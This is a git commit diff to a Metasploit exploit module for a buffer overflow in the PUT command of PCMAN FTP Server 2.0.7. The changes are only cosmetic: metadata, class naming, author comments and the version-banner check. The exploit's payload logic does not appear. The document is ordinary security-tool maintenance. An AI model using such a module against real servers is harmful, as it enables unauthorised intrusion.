Few updates per OJ and wvu

bug/bundler_fix
Chris Higgins 2016-01-26 23:19:18 -06:00
parent 3cab27086f
commit 2df458c359
1 changed files with 7 additions and 8 deletions

View File

@ -5,14 +5,14 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'PCMAN FTP Server v2.0.7 Buffer Overflow - PUT Command',
'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'Jay Turla @shipcod3', # Initial Discovery
'Chris Higgins @ch1gg1ns' # msf Module
'Jay Turla', # Initial Discovery -- @shipcod3
'Chris Higgins' # msf Module -- @ch1gg1ns
],
'License' => MSF_LICENSE,
'References' =>
@ -30,8 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'VERBOSE' => true
'EXITFUNC' => 'process'
},
'Payload' =>
{
@ -57,9 +56,9 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
if /220 PCMan's FTP Server 2\.0/ === banner
return Exploit::CheckCode::Appears
Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
end